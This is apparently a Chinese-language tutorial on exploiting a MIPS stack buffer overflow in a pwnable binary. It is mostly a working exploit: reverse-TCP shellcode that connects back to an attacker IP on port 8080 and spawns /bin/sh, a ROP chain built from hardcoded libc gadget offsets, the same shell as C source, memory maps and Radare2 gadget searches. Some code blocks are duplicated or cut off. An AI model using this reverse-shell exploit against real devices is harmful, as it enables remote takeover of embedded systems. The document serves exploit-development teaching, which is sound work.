        "\xff\xff\xa4\x8f", # lw    a0,-1(sp)
        "\xfd\xff\x0f\x3c", # lui   t7,0xfffd
        "\x27\x78\xe0\x01", # nor   t7,t7,zero
        "\xe0\xff\xaf\xaf", # sw    t7,-32(sp)

    # Connect back port 8080
        "\x1f\x90\x0e\x3c", # lui t6,0x901f
        "\x1f\x90\xce\x35", # ori t6,t6,0x901f
        "\xe4\xff\xae\xaf", # sw    t6,-28(sp)

    # IP Address
        IP_3+IP_4+"\x0e\x3c",   # lui       t6,<ip>
        IP_1+IP_2+"\xce\x35",   # ori       t6,t6,<ip>

        "\xe6\xff\xae\xaf", # sw    t6,-26(sp)
        "\xe2\xff\xa5\x27", # addiu a1,sp,-30
        "\xef\xff\x0c\x24", # li    t4,-17
        "\x27\x30\x80\x01", # nor   a2,t4,zero
        "\x4a\x10\x02\x24", # li    v0,4170
        "\x0c\x01\x01\x01", # syscall   0x40404
        "\xfd\xff\x0f\x24", # li    t7,-3
        "\x27\x78\xe0\x01", # nor   t7,t7,zero
        "\xff\xff\xa4\x8f", # lw    a0,-1(sp)
        "\x21\x28\xe0\x01", # move  a1,t7
        "\xdf\x0f\x02\x24", # li    v0,4063
        "\x0c\x01\x01\x01", # syscall   0x40404
        "\xff\xff\x10\x24", # li    s0,-1
        "\xff\xff\xef\x21", # addi  t7,t7,-1
        "\xfa\xff\xf0\x15", # bne   t7,s0,68 <dup2_loop>
        "\xff\xff\x06\x28", # slti  a2,zero,-1
        "\x62\x69\x0f\x3c", # lui   t7,0x6962
        "\x2f\x2f\xef\x35", # ori   t7,t7,0x2f2f
        "\xec\xff\xaf\xaf", # sw    t7,-20(sp)
        "\x73\x68\x0e\x3c", # lui   t6,0x6873
        "\x6e\x2f\xce\x35", # ori   t6,t6,0x2f6e
        "\xf0\xff\xae\xaf", # sw    t6,-16(sp)
        "\xf4\xff\xa0\xaf", # sw    zero,-12(sp)
        "\xec\xff\xa4\x27", # addiu a0,sp,-20
        "\xf8\xff\xa4\xaf", # sw    a0,-8(sp)
        "\xfc\xff\xa0\xaf", # sw    zero,-4(sp)
        "\xf8\xff\xa5\x27", # addiu a1,sp,-8
        "\xab\x0f\x02\x24", # li    v0,4011
        "\x0c\x01\x01\x01"  # syscall   0x40404
    ], '')

# sleep = 0x767142b0 qemu
# sleep = 0x2ab6d2b0 device

# libraries and offsets
libc = 0x2ab3e000 #0x766e5000 #0x2ab3e000 #
sleep_offset = 0x0002f2b0
rop1_offset = 0x000377cc # to get s1 and s0
rop2_offset = 0x000189ec # move t9, s0 jalr t9, nop
rop3_offset = 0x00033d8c # sp into a1
rop4_offset = 0x0001fbcc # a1 into t9 then jump to t9

# Craft Exploit
message = "A" * 51 # Padding
message += struct.pack("<L", libc+rop1_offset) # RA rop1
message += "B" * 40 # padding for lw offset

#Gadget 2 - sleep
message += struct.pack("<L", libc+sleep_offset) #s0 0x28
message += "MMMM" #s1 0x2c
message += struct.pack("<L", libc+rop2_offset) #ra 0x30

# Gadget 3
message += "C" * 60
message += "0" * 4 # s0
message += "1" * 4 # s1
message += "2" * 4 # s2
message += "3" * 4 # s3
message += "4" * 4 # s4
message += struct.pack("<L", libc+rop3_offset) # RA

# Gadget 4
message += "D" * (72-48)

# XOR s0, s0
message += struct.pack("<L",0x02108026) #xor s0 s0
message += struct.pack("<L",0x02b5a826)
message += struct.pack("<L",0x02b5a826)
message += struct.pack("<L", 0xafb0fff8) # sw s0, -8(sp)

#One more Sleep for 5 seconds

# nop to shellcode
message += struct.pack("<L",0x02b5a826) * 8 # xor s5,s5
message += struct.pack("<L", libc+rop4_offset) # RA then null
message += struct.pack("<L", 0xafa0fffc) # sw s0, -4(sp)
message += shellcode
# a0 for sleep is 5 - first gadget
Gadget 1
  0x000377cc           3000bf8f  lw ra, 0x30(sp)
  0x000377d0           2c00b18f  lw s1, 0x2c(sp)
  0x000377d4           2800b08f  lw s0, 0x28(sp)
  0x000377d8           0800e003  jr ra
Gadget 2
  0x000189ec      21c80002       move t9, s0
  0x000189f0      09f82003       jalr t9
  0x000189f4      01000524       addiu a1, zero, 1
  0x000189f8      02000010       b 0x18a04
Gadget 3
  0x00033d8c           1800a527  addiu a1, sp, 0x18
  0x00033d90           1000bc8f  lw gp, 0x10(sp)
  0x00033d94           4800bf8f  lw ra, 0x48(sp)
  0x00033d98           0800e003  jr ra
Gadget 4
  0x0001fbcc           21c8a000  move t9, a1
  0x0001fbd0           38008424  addiu a0, a0, 0x38
  0x0001fbd4           08002003  jr t9

try :
    #Set the whole string
except socket.error:
    #Send failed
    print 'Send failed'

print 'Exploit Sent - Check your netcat listener in about 5 seconds.'

由于堆栈是可执行的,并且库地址不会移动,我们可以对我们的ROP链进行硬编码,但最终ROP链的想法是将$SP内的值移动到可以调用的寄存器中。 硬编码堆栈地址在我看来并不可靠,我宁愿使用偏移量代替。 下面是pwnable二进制的map输出。

# ./socket_bof 8888 &
Binding to port 8888

# cat /proc/11554/maps
00400000-00402000 r-xp 00000000 1f:02 218        /pwnable/ShellCode_Required/socket_bof
00441000-00442000 rw-p 00001000 1f:02 218        /pwnable/ShellCode_Required/socket_bof
2aaa8000-2aaad000 r-xp 00000000 1f:02 440        /lib/ld-uClibc.so.0
2aaad000-2aaae000 rw-p 2aaad000 00:00 0
2aaec000-2aaed000 r--p 00004000 1f:02 440        /lib/ld-uClibc.so.0
2aaed000-2aaee000 rw-p 00005000 1f:02 440        /lib/ld-uClibc.so.0
2aaee000-2aafe000 r-xp 00000000 1f:02 445        /lib/libgcc_s.so.1
2aafe000-2ab3d000 ---p 2aafe000 00:00 0
2ab3d000-2ab3e000 rw-p 0000f000 1f:02 445        /lib/libgcc_s.so.1
2ab3e000-2ab79000 r-xp 00000000 1f:02 444        /lib/libc.so.0
2ab79000-2abb9000 ---p 2ab79000 00:00 0
2abb9000-2abba000 rw-p 0003b000 1f:02 444        /lib/libc.so.0
2abba000-2abbe000 rw-p 2abba000 00:00 0
7f81e000-7f833000 rwxp 7f81e000 00:00 0          [stack]



整个ROP链与Radare2的/R功能一起使用。例如,我正在为我的上一个ROP小工具寻找“move t9,a1”,并通过执行以下操作来找到它:

[0x00017ae0]> /R move t9, a1
  0x0001f078           4c0082ac  sw v0, 0x4c(a0)
  0x0001f07c           21c8a000  move t9, a1
  0x0001f080           4c008424  addiu a0, a0, 0x4c
  0x0001f084           08002003  jr t9
  0x0001f088           2128c000  move a1, a2

  0x0001fbc8           380082ac  sw v0, 0x38(a0)
  0x0001fbcc           21c8a000  move t9, a1       // Offset within Libc that was used for Gadget #4
  0x0001fbd0           38008424  addiu a0, a0, 0x38
  0x0001fbd4           08002003  jr t9
  0x0001fbd8           2128c000  move a1, a2

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(void) {
    int sockfd;
    int lportno = 8080;    // listener port
    struct sockaddr_in serv_addr;
    char *const params[] = {"/bin/sh",NULL};
    char *const environ[] = {NULL};

    sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    serv_addr.sin_family = AF_INET; // 2
    serv_addr.sin_addr.s_addr = inet_addr(""); // RHOST
    serv_addr.sin_port = htons(lportno);
    connect(sockfd, (struct sockaddr *) &serv_addr, 16);

    // redirect stdout and stderr
    dup2(sockfd,0); // stdin
    dup2(0,1); // stdout
    dup2(0,2); // stderr


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(void) {
    int sockfd;
    int lportno = 8080;    // listener port
    struct sockaddr_in serv_addr;
    char *const params[] = {"/bin/sh",NULL};
    char *const environ[] = {NULL};

    sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    serv_addr.sin_family = AF_INET; // 2
    serv_addr.sin_addr.s_addr = inet_addr(""); // RHOST
    serv_addr.sin_port = htons(lportno);
    connect(sockfd, (struct sockaddr *) &serv_addr, 16);

    // redirect stdout and stderr
    dup2(sockfd,0); // stdin
    dup2(0,1); // stdout
    dup2(0,2); // stderr

如果看一下Bowcaster Reverse_TCP shellcode,会看发现上面的C代码和Bowcaster Shellcode是相同的。

hellcode = string.join([
        "\xfa\xff\x0f\x24", # li    t7,-6
        "\x27\x78\xe0\x01", # nor   t7,t7,zero
        "\xfd\xff\xe4\x21", # addi  a0,t7,-3
        "\xfd\xff\xe5\x21", # addi  a1,t7,-3
        "\xff\xff\x06\x28", # slti  a2,zero,-1

    # Socket SYSCall
        "\x57\x10\x02\x24", # li    v0,4183
        "\x0c\x01\x01\x01", # syscall   0x40404

        "\xff\xff\xa2\xaf", # sw    v0,-1(sp)
        "\xff\xff\xa4\x8f", # lw    a0,-1(sp)
        "\xfd\xff\x0f\x3c", # lui   t7,0xfffd
        "\x27\x78\xe0\x01", # nor   t7,t7,zero
        "\xe0\xff\xaf\xaf", # sw    t7,-32(sp)

    # Connect back port 8080
        "\x1f\x90\x0e\x3c", # lui t6,0x901f
        "\x1f\x90\xce\x35", # ori t6,t6,0x901f
        "\xe4\xff\xae\xaf", # sw    t6,-28(sp)

    # IP Address
        IP_3+IP_4+"\x0e\x3c",   # lui       t6,<ip>
        IP_1+IP_2+"\xce\x35",   # ori       t6,t6,<ip>

        "\xe6\xff\xae\xaf", # sw    t6,-26(sp)
        "\xe2\xff\xa5\x27", # addiu a1,sp,-30
        "\xef\xff\x0c\x24", # li    t4,-17
        "\x27\x30\x80\x01", # nor   a2,t4,zero

    # Socket Connect SYSCALL
        "\x4a\x10\x02\x24", # li    v0,4170
        "\x0c\x01\x01\x01", # syscall   0x40404

        "\xfd\xff\x0f\x24", # li    t7,-3
        "\x27\x78\xe0\x01", # nor   t7,t7,zero
        "\xff\xff\xa4\x8f", # lw    a0,-1(sp)
        "\x21\x28\xe0\x01", # move  a1,t7

    # Dup2 SYSCAL
        "\xdf\x0f\x02\x24", # li    v0,4063
        "\x0c\x01\x01\x01", # syscall   0x40404

        "\xff\xff\x10\x24", # li    s0,-1
        "\xff\xff\xef\x21", # addi  t7,t7,-1
        "\xfa\xff\xf0\x15", # bne   t7,s0,68 <dup2_loop>
        "\xff\xff\x06\x28", # slti  a2,zero,-1
        "\x62\x69\x0f\x3c", # lui   t7,0x6962
        "\x2f\x2f\xef\x35", # ori   t7,t7,0x2f2f
        "\xec\xff\xaf\xaf", # sw    t7,-20(sp)
        "\x73\x68\x0e\x3c", # lui   t6,0x6873
        "\x6e\x2f\xce\x35", # ori   t6,t6,0x2f6e
        "\xf0\xff\xae\xaf", # sw    t6,-16(sp)
        "\xf4\xff\xa0\xaf", # sw    zero,-12(sp)
        "\xec\xff\xa4\x27", # addiu a0,sp,-20
        "\xf8\xff\xa4\xaf", # sw    a0,-8(sp)
        "\xfc\xff\xa0\xaf", # sw    zero,-4(sp)
        "\xf8\xff\xa5\x27", # addiu a1,sp,-8

    # Execve SYSCALL
        "\xab\x0f\x02\x24", # li    v0,4011
        "\x0c\x01\x01\x01"  # syscall   0x40404
    ], '')
        首先安装套接字(系统调用w /值4183)
        连接到套接字(Syscall w / Value 4170)
        使用/ bin / sh调用Execve(系统调用,值为4011)
可以通过查看Radare2中反汇编来验证系统调用。 我们将继续验证Socket系统调用。
| [0x400680]              |
| __GI_socket:            |
| (fcn) sym.socket 36     |
| lui gp, 5               |
| addiu gp, gp, -0x6600   |
| addu gp, gp, t9         |
| addiu sp, sp, -0x20     |
| sw ra, 0x1c(sp)         |
| sw s0, 0x18(sp)         |
| sw gp, 0x10(sp)         |
| addiu v0, zero, 0x1057  | // Hex 0x1057 is 4183 in decimal
| syscall                 |

我们可以看到值4183的系统调用是对C函数socket()的调用。 所有其他系统调用都以相同的方式进行了验证。


另请注意,shellcode在用户态QEMU中不能正常工作。 你将看到的这个shellcode的是一个带有错误消息的TCP连接而不是交互式shell。 在实际设备上运行时的shellcode按预期执行。


分析运行期间执行的指令的一种简单方法是利用Qira。 下图显示了Qira如何用于分析二进制文件而无需设置断点。






总而言之,有时候在制作漏洞利用的时候重新发明轮子并不是必要的,但是设计自己的shellcode和shellcode编码器是开发漏洞的好方法。 但在决定从头开始设计一切之前,一定要先利用所有可用的工具。 利用现有的shellcode并没有什么错,特别是如果它最终会正常工作,但一定要在使用它之前审计你在网上找到的任何shellcode。

[培训]内核驱动高级班,冲击BAT一流互联网大厂工 作,每周日13:00-18:00直播授课

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